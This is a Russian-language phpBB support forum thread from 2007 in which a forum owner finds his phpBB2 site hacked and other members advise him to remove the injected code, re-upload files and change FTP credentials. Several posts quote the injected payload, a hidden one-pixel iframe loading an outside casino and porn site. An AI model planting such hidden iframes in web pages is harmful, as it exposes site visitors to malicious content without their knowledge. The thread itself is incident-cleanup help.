Помогите пожалуйста разобраться что случилось с моим форумом:
http://forum.799595.ru
Сегодня в 03:15 МСК обнаружил.
Самые главные вопросы:
1) В чем может быть дело (что это такое) ?
2) Как это могло случиться (или кто и как помог) ? вчера еще небыло.
3) Как это исправить, чтобы сохранить все темы и сообщения.
В тех.поддержке на http://hc.ru говорят что это проблемы не у них с хостингом, а у меня со скриптом.
Дело то понятное, что они скажут, что проблемы не у них. Хотя с другой стороны, судя по этим строчкам (Warning) вроде бы я понимаю, что это дело действительно со скриптом самого phpbb2 в www/htdocs
Но я полагаю, что если форум работает нормально, то такое вдруг произойти не может. Или я не прав и скрипт phpbb2 может вот так ни с того ни с сего квакнуться.
Буду теперь каждый день сохранять конфигурационный файл.
Надеюсь что написал в Ту Тему, а также на конструктивные ответы, поскольку от техподдержки я их не получил и вероятнее не получу.
На них буду воздействовать административными способами.
Взлом. Опять инфобокс. И не только...
-
Скайнет
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 1 месяц
- Откуда: Хабаровск
-
Lanior
- phpBB 1.4.4
- Сообщения: 144
- Стаж: 19 лет 8 месяцев
-
Скайнет
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 1 месяц
- Откуда: Хабаровск
а там пробелов нету, там есть такая строка внизу:
?><iframe src='http://nerik.info/' width='1' height='1' style='visibility: hidden;'></iframe>
Что это за http://nerik.info
Зашел, а там инт-казино и порно-фото какието!!!
Это должно быть в phpbb2 или это ктото туда подкинул???
?><iframe src='http://nerik.info/' width='1' height='1' style='visibility: hidden;'></iframe>
Что это за http://nerik.info
Зашел, а там инт-казино и порно-фото какието!!!
Это должно быть в phpbb2 или это ктото туда подкинул???
Последний раз редактировалось Скайнет 09.04.2007 15:12, всего редактировалось 1 раз.
-
Dimid
- phpBB 1.0.0
- Сообщения: 2
- Стаж: 18 лет
- Откуда: Ростов
Помогите! У меня хорошо работал форум потом на некоторых темах при отправке сообщения пишет
"Ran into problems sending Mail. Response: 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
DEBUG MODE
Line : 165
File : smtp.php"
Причём это не на всех темах. Что это может быть? Я вроде не чё не менял и настройки не трогал. Форум у меня в локалке, так сказать внутренний. Буду очень сильно признателен за помошь!
"Ran into problems sending Mail. Response: 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
DEBUG MODE
Line : 165
File : smtp.php"
Причём это не на всех темах. Что это может быть? Я вроде не чё не менял и настройки не трогал. Форум у меня в локалке, так сказать внутренний. Буду очень сильно признателен за помошь!
-
Поручик
- Former team member
- Сообщения: 3942
- Стаж: 19 лет 11 месяцев
- Откуда: Оренбург (Южный Урал)
- Благодарил (а): 3 раза
Скайнет, наши поздравления. Вас хакнули. Причем не только вас, но, подозреваю, и некоторых клиентов вашего *раного хостера. На агаве такая же хренотень недавно была.
Добавлено спустя 1 минуту 43 секунды:
Залейте файло на сервак по новой. У вас должны быть на винте копии.
Добавлено спустя 1 минуту 43 секунды:
Залейте файло на сервак по новой. У вас должны быть на винте копии.
Профессионал - тот же дилетант, только знающий, где ошибётся.
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
-
Скайнет
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 1 месяц
- Откуда: Хабаровск
Lanior
Спасибо Вам большое!!!!!!!!!!!!!!!!!
Я удали все что было после
?>
а в частности строку
<iframe src='http://nerik.info/' width='1' height='1' style='visibility: hidden;'></iframe>
И все вернулось на круги своя!
Я очень вам признателен и благодарен!
Более конструктивного ответа я и не ожидал даже!
Но немного отниму еще ваше время, подскажите, от куда эта строчка там взялась???
Ведь это нужно зайти по ftp чтобы ее туда вписать. Или я чегото не знаю. Теоритически можно хакнуть phpbb2 не заходя по ftp?
Спасибо Вам большое!!!!!!!!!!!!!!!!!
Я удали все что было после
?>
а в частности строку
<iframe src='http://nerik.info/' width='1' height='1' style='visibility: hidden;'></iframe>
И все вернулось на круги своя!
Я очень вам признателен и благодарен!
Более конструктивного ответа я и не ожидал даже!
Но немного отниму еще ваше время, подскажите, от куда эта строчка там взялась???
Ведь это нужно зайти по ftp чтобы ее туда вписать. Или я чегото не знаю. Теоритически можно хакнуть phpbb2 не заходя по ftp?
-
Поручик
- Former team member
- Сообщения: 3942
- Стаж: 19 лет 11 месяцев
- Откуда: Оренбург (Южный Урал)
- Благодарил (а): 3 раза
Dimid, может сгоняете сами на translate.ru?
Профессионал - тот же дилетант, только знающий, где ошибётся.
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
-
Скайнет
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 1 месяц
- Откуда: Хабаровск
Спасибо и тому что Ваш форум существует !!!
Добавлено спустя 1 час 18 минут 56 секунд:
Представляете!!!
Только что опять произошло тоже самое!!!!!!!!!!!
Я уже сам быстренько зашел (по вышеуказанному пути) и все исправил.
И там опять после ?> была таже самая строка:
<iframe src='http://nerik.info/' width='1' height='1' style='visibility: hidden;'></iframe>
Подскажите от куда это берется???
Это делают руками или это боты итд???
Как это делают, по ftp или через браузер???
Щас мигом сменю логин/пароль доступа к ftp !!!
Добавлено спустя 1 час 18 минут 56 секунд:
Представляете!!!
Только что опять произошло тоже самое!!!!!!!!!!!
Я уже сам быстренько зашел (по вышеуказанному пути) и все исправил.
И там опять после ?> была таже самая строка:
<iframe src='http://nerik.info/' width='1' height='1' style='visibility: hidden;'></iframe>
Подскажите от куда это берется???
Это делают руками или это боты итд???
Как это делают, по ftp или через браузер???
Щас мигом сменю логин/пароль доступа к ftp !!!
Последний раз редактировалось Скайнет 10.04.2007 5:05, всего редактировалось 1 раз.
-
Поручик
- Former team member
- Сообщения: 3942
- Стаж: 19 лет 11 месяцев
- Откуда: Оренбург (Южный Урал)
- Благодарил (а): 3 раза
Скайнет, проверьте все файлы форума, сайта, все каталоги на вашем сервере. Может еще что обнаружите странное, непонятное и явно лишнее.
Профессионал - тот же дилетант, только знающий, где ошибётся.
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
-
Скайнет
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 1 месяц
- Откуда: Хабаровск
версия phpbb2
дистрибутив качал с вашего форума.
Добавлено спустя 2 часа 39 минут 56 секунд:
Мой приятель пишет:
BooMeR (11:56 AM) :
язык php является открытым исходником, и твой форум может скачать кто угодно. ))
он берет аналогичный движек форума, и начинает смотреть как он устроен, и если хорошо искать то можно найти метод обхода защиты. Вот. Ну а если форум платный, то его исходники лежат только у тебя и соответственно никто не сможет в них порыться чтобы найти уязвимость.
Значит получается что если ктото захочет "хакнуть" форум на phpbb то он его "хакнет"
дистрибутив качал с вашего форума.
Добавлено спустя 2 часа 39 минут 56 секунд:
Мой приятель пишет:
BooMeR (11:56 AM) :
язык php является открытым исходником, и твой форум может скачать кто угодно. ))
он берет аналогичный движек форума, и начинает смотреть как он устроен, и если хорошо искать то можно найти метод обхода защиты. Вот. Ну а если форум платный, то его исходники лежат только у тебя и соответственно никто не сможет в них порыться чтобы найти уязвимость.
Значит получается что если ктото захочет "хакнуть" форум на phpbb то он его "хакнет"
-
Xpert
- phpBB Guru
- Сообщения: 5484
- Стаж: 21 год 1 месяц
- Поблагодарили: 2 раза
Можно подумать дистрибутивы платных форумов нельзя свободно скачать с сетиСкайнет писал(а):Значит получается что если ктото захочет "хакнуть" форум на phpbb то он его "хакнет"
Хакнуть можно что угодно если владелец за этим что-то не следит.
А подверсия?Скайнет писал(а):версия phpbb2
дистрибутив качал с вашего форума.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
-
Dimid
- phpBB 1.0.0
- Сообщения: 2
- Стаж: 18 лет
- Откуда: Ростов
